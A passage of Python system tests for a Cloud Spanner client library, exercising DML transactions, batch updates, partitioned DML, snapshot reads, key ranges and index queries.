# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "[email protected]"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "[email protected]"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "[email protected]"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "[email protected]"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "[email protected]"
target = "[email protected]"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%[email protected]" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
